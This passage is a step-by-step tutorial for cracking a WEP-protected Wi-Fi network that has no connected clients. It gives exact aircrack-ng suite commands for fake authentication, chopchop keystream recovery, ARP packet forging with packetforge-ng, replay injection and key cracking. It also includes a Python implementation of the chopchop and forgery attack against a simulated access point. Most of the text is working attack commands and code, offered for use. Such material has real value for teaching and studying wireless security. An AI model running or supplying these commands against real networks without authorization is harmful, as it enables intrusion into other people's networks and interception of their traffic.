Let's now see how to get in when no client is connected to the network.
This attack only works once we capture at least one encrypted data frame from the access point, and with no wireless clients that frame has to originate on the wired side: the AP has RJ45 ports, and broadcast traffic from the LAN (ARP, for instance) gets bridged onto the air. Why do we need it?
WEP encrypts each frame by XORing it with an RC4 keystream and appends a CRC-32 integrity check (the ICV) that is encrypted along with the data. Without the keystream that goes with some IV we cannot build a frame whose ICV checks out, so anything we make up is simply discarded. The AP also ignores data frames from a station that is not associated and answers them with a deauthentication, which is why the fake authentication below is needed.
Once we have one real frame, either a chopchop attack or a fragmentation attack recovers the keystream (the PRGA) that encrypted it and saves it as a .xor file. That keystream lets us build a valid encrypted packet without knowing the key, and injecting it makes the AP rebroadcast it, producing new packets (IVs).
The forged packet is accepted because, from the AP's point of view, it decrypts to a frame with a correct ICV.
After we create that packet and inject it, the attack continues exactly as it did with an associated client: once we have enough IVs it is time to crack the key.
So, let’s get started. First, put the wireless card in monitor mode. You know the drill:
#airmon-ng start wlan0
Then use:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 wlan0
At this point you don't really need the "-w" parameter, since very few packets will arrive yet. It's up to you.
Let’s now associate with an access point, using a fake authentication:
#aireplay-ng -1 0 -e WLAN -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-1 means fake authentication attack
0 is the reassociation timing in seconds; with 0, aireplay-ng makes a single authentication attempt (use a value such as 30 to re-authenticate periodically and keep the association alive)
-e WLAN is the wireless network's SSID
-a 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is our card's MAC address
wlan0 is the wireless interface name
So the fake authentication against the AP succeeded.
Now I need to obtain the PRGA (pseudo-random generation algorithm) file, that is, the RC4 keystream bytes that encrypted one frame under a given IV.
To obtain it we perform either a chopchop attack or a fragmentation attack.
This PRGA is not the WEP key and cannot decrypt arbitrary packets. It can, however, be used to create new packets for injection under the same IV. The creation of new packets is covered later in the tutorial.
Both attacks produce the same kind of .xor file, so use whichever works against your AP. Two caveats: chopchop only recovers as many keystream bytes as the captured packet is long, and some access points drop the chopped frames, while the fragmentation attack can recover up to about 1500 bytes of keystream but is not supported by every driver.
I will cover the chopchop technique. Start another console session and run:
#aireplay-ng -4 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-4 means the chopchop attack
-b 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is the MAC address of our card and must match the MAC used in the fake authentication
wlan0 is the wireless interface name
After the fake authentication you have to wait for a data frame to attack. I kept one console window repeating the fake authentication every second, so that I don't get deauthenticated for whatever reason, and another one running the chopchop attack, waiting for a packet to start on.
When the console asks you “Use this packet?” press “y” and then ENTER to start the chopchop attack.
Wait a few seconds for the chopchop attack to do its work. The file it writes, "replay_dec-0917-223734.xor", is used in the next step to generate an ARP packet.
The objective is to have the access point rebroadcast the injected Arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.
Use the following command:
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request
-0 means generate an ARP packet
-a 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is the MAC address of our card
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y replay_dec-0917-223734.xor is the file to read the PRGA from
-w arp-request is the name of the file to write the ARP packet to
The system will respond: “Wrote packet to: arp-request”
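To show what the chopchop step and the packetforge-ng step above actually do, here is an added, self-contained Python model; it is not part of the original tutorial and not aircrack-ng code. It assumes the tutorial's 40-bit key 1234567890 (known only to the simulated AP), a constructed IV, a constructed ARP request standing in for the frame bridged from the wired side, and a local accept/reject function in place of the real AP. It recovers the full keystream for that IV without ever touching the key, then reuses it to forge the broadcast ARP request that packetforge-ng builds:

```python
"""Toy WEP model of the chopchop and packetforge-ng steps: recover the RC4 keystream (PRGA) of
one captured frame using only the AP's accept/reject behaviour, then reuse it to forge a
broadcast ARP request the AP accepts. Constructed example, not aircrack-ng code."""
import struct
import zlib

# Known plaintext opening every WEP-encrypted ARP frame: LLC/SNAP header, ethertype 0x0806.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")

def rc4_keystream(key, n):
    """RC4 KSA + PRGA; WEP seeds it with IV || key."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data):
    """WEP integrity check value: CRC-32 of the payload, little-endian, encrypted with it."""
    return struct.pack("<I", zlib.crc32(data))

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key, iv, payload):
    plain = payload + icv(payload)
    return iv + xor(plain, rc4_keystream(iv + key, len(plain)))

def ap_accepts(key, frame):
    """AP side: decrypt and check the ICV. The attacker only ever sees True/False."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    return icv(plain[:-4]) == plain[-4:]

def _crc_entry(i):  # reflected CRC-32 table (poly 0xEDB88320), the one zlib uses
    for _ in range(8):
        i = (i >> 1) ^ 0xEDB88320 if i & 1 else i >> 1
    return i
CRC_TBL = [_crc_entry(i) for i in range(256)]

def chopchop(frame, oracle):
    """KoreK chopchop: drop the last byte, then find the one 4-byte correction that makes the
    shorter frame's ICV valid again. CRC-32 is linear, so the correction depends only on the
    table index idx the CRC used when absorbing the removed byte (256 guesses at most), and
    the accepted guess reveals the keystream byte at the removed position."""
    iv, cur, ks = frame[:3], bytearray(frame[3:]), {}
    while len(cur) > 4:                      # stop when only an ICV would remain
        for idx in range(256):
            t, cand = CRC_TBL[idx], bytearray(cur[:-1])
            cand[-4] ^= idx ^ 0xFF           # former last data byte becomes ICV byte 0
            cand[-3] ^= t & 0xFF             # former ICV bytes 0..2 become ICV bytes 1..3
            cand[-2] ^= (t >> 8) & 0xFF
            cand[-1] ^= (t >> 16) & 0xFF
            if oracle(iv + bytes(cand)):
                # top byte of the old CRC register equals the top byte of CRC_TBL[idx]
                ks[len(cur) - 1] = cur[-1] ^ (t >> 24) ^ 0xFF
                cur = cand
                break
        else:
            raise RuntimeError("AP accepted none of the 256 guesses")
    return ks

def recover_keystream(frame, oracle, known_prefix=LLC_SNAP_ARP):
    """Full PRGA for this IV (what the .xor file holds): chopchop covers everything except
    the first four bytes, which come from the known LLC/SNAP header instead."""
    ks, body = chopchop(frame, oracle), frame[3:]
    for i, p in enumerate(known_prefix):
        ks[i] = body[i] ^ p
    return bytes(ks[i] for i in range(len(body)))

def arp_request(sender_mac, sender_ip, target_ip):
    """LLC/SNAP + ARP request (hw type 1, proto 0x0800, hlen 6, plen 4, opcode 1)."""
    return (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + bytes(6) + target_ip)

def forge(iv, prga, payload):
    """packetforge-ng's job: encrypt a new payload under the same IV with the recovered
    keystream. No key involved; the payload must fit inside the keystream."""
    plain = payload + icv(payload)
    if len(plain) > len(prga):
        raise ValueError("payload longer than the recovered keystream")
    return iv + xor(plain, prga)

def demo():
    key = bytes.fromhex("1234567890")        # the tutorial's 40-bit key; only the AP side uses it
    iv = bytes.fromhex("0c5a11")             # constructed IV
    # The one frame off the air: assume an ARP request bridged from the wired side (constructed
    # addresses; the sender MAC is the tutorial's AP, 00:80:5A:28:B5:AB).
    captured = wep_encrypt(key, iv, arp_request(bytes.fromhex("00805a28b5ab"),
                                                bytes([192, 168, 1, 1]), bytes([192, 168, 1, 50])))
    oracle = lambda f: ap_accepts(key, f)    # the only thing the attacker gets to observe
    prga = recover_keystream(captured, oracle)
    # Equivalent of packetforge-ng -0 -k 255.255.255.255 -l 255.255.255.255 from our card's MAC.
    forged = forge(iv, prga, arp_request(bytes.fromhex("74ea3a90c721"), b"\xff" * 4, b"\xff" * 4))
    return {"prga_correct": prga == rc4_keystream(iv + key, len(prga)),
            "forged_accepted": ap_accepts(key, forged),
            "made_up_accepted": ap_accepts(key, iv + bytes(len(prga)))}  # no keystream: rejected
```

Run demo() and all three facts the text relies on come out: the recovered PRGA equals the real keystream, the forged ARP request passes the AP's ICV check although the key was never used, and a frame made up without keystream is rejected. The real aireplay-ng does the same guessing against the live AP, which is why the chopchop needs you to stay associated (the fake authentication) and why it takes a moment per byte.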
Now close the console running airodump-ng and start airodump-ng again in a new one. This time add the "-w" parameter so the IVs we are about to generate are saved to a file. If you already used it the first time, there is no need to restart it.
So use airodump-ng like this:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wepkey wlan0
Let's call that file wepkey.
In the console window you used to create the packet, run:
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0
This reads the packet we created and injects it into the air. aireplay-ng will first ask whether you want to use that packet; press "y" and ENTER to start injecting ARP requests.
Once the injection is running, the rest of the process is exactly the same as cracking WEP with an associated client.
As you can see, we are now collecting a lot of data (IVs).
Remember once again: with around 50 000 IVs you have a good chance of cracking the network.
Don't worry if it fails; try again with more IVs. The number you need grows with the key length, and you cannot tell the key length from the traffic (aircrack-ng tries the common lengths itself), so start at 50 000, go to 200 000 if that fails, and keep collecting until it works.
The point is that you are doing it the right way; a failed run is bad luck, not a mistake.
All the captured data packets containing IVs are stored in the files airodump-ng writes with the prefix I chose, wepkey. It writes several files in different formats to the current directory, but we only need the .cap files.
Airodump-ng may create more than one .cap file, numbered wepkey-01.cap, wepkey-02.cap and so on, which is why the wildcard below is used.
So, when you’re ready, use the command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap
As you can see, it found the network's WEP key. The key I set for this example was the 40-bit hex key 1234567890, which aircrack-ng prints byte by byte: "KEY FOUND! [12:34:56:78:90]". (Typed as ASCII, the same ten characters would be 80 bits, which is not a valid WEP key length, so the output confirms the key was configured in hex.)